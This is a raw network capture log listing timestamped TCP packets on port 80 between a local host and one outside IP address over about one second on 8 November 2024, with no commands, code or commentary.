Nov 8, 2024 15:20:53.294939995 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.295207977 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295224905 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295238018 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295249939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295273066 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.295291901 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.295741081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295753002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295762062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.295799971 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.296431065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296442986 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296488047 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.296552896 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296564102 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296590090 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.296642065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296655893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296667099 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296694994 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.296720028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.296756029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296768904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.296801090 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.332956076 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.332967043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.332978010 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333022118 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.333261967 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333338976 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.333772898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333784103 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333794117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333842993 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.333894968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333920956 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333935976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.333959103 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.333970070 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.377741098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.377758026 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.377768040 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.377774000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.377849102 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.377911091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.390918970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.390937090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.390948057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.390974045 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.391010046 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.413800955 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413819075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413830996 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413844109 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413858891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413865089 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.413904905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.413963079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413975000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.413989067 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414007902 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414026022 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414236069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414248943 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414261103 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414290905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414361000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414374113 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414426088 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414755106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414805889 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414819956 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414832115 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414859056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414861917 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.414871931 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414885044 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.414900064 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.451940060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.451960087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.451972961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.451999903 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.452028990 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.452693939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452707052 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452713013 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452754974 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.452802896 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452816010 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452857971 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.452953100 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.452966928 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.453007936 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.453073025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.453367949 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.496567965 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496589899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496608019 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496620893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496655941 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.496701956 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.496738911 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496750116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.496783018 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.509872913 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.509891033 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.509907007 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.509939909 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.532718897 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.532732964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.532743931 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.532768011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.532776117 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.532810926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.532816887 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.532855988 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533054113 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533066034 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533077002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533101082 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533176899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533293009 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533371925 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533382893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533394098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533420086 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533655882 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533822060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533837080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533848047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533859968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533863068 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533874989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.533885002 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.533912897 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.534286976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.534298897 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.534308910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.534326077 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.534357071 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.570672989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.570686102 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.570697069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.570734024 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.571624994 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571639061 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571661949 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571672916 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571683884 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.571686983 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571712971 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.571727037 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.571902037 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571913958 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571923971 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571937084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.571953058 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.571990967 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.615430117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.615499020 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.615509987 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.615525961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.615537882 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.615556955 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.615596056 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.628707886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.628737926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.628748894 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.628756046 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.628760099 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.628819942 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651496887 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651530981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651554108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651557922 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651566982 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651586056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651657104 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651657104 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651757002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651860952 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651901007 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651917934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651928902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651938915 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651940107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.651964903 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.651981115 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.652364969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652390003 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652403116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652414083 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652426004 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652436018 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.652482986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.652828932 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652841091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652853012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652873039 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.652879000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652890921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652901888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.652934074 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.652934074 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.653536081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.653588057 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.653589964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690082073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690098047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690109015 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690141916 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.690188885 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.690644979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690659046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690681934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690696955 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690706968 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.690711021 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690736055 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.690907001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690918922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690929890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.690958023 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.690985918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.734572887 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.734602928 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.734616995 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.734628916 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.734644890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.734652042 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.734673977 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.747967958 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.747981071 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.747996092 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.748022079 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.748054028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.770518064 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770539999 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770564079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770581961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770595074 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770596981 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.770611048 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770637989 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.770653963 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.770860910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770944118 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770955086 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770973921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770983934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.770992041 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.770996094 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771008968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771019936 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771025896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.771044970 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.771066904 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.771728992 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771740913 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771750927 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.771780014 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.772079945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772090912 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772129059 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.772224903 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772237062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772247076 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772258997 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772269011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.772270918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.772303104 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.808624029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.809297085 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.809355974 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.833511114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833647966 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833661079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833673954 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833688974 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.833695889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833709955 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833719015 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.833724976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833738089 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833753109 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.833758116 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.833777905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.833966017 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.834014893 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.834191084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853472948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853492022 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853503942 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853517056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853545904 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.853570938 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.853610039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853640079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.853646994 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.866673946 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.866751909 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.866828918 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889450073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889463902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889475107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889503956 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889520884 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889523029 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889566898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889642000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889652014 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889734983 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889746904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889759064 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889769077 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889792919 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.889945030 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889955997 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889966011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.889996052 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890161037 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890177965 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890191078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890201092 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890227079 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890259981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890271902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890294075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890317917 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890796900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890831947 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890845060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890901089 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890912056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890939951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890944958 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890958071 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890971899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.890981913 CET	80	49800	185.215.113.16	192.168.2.9
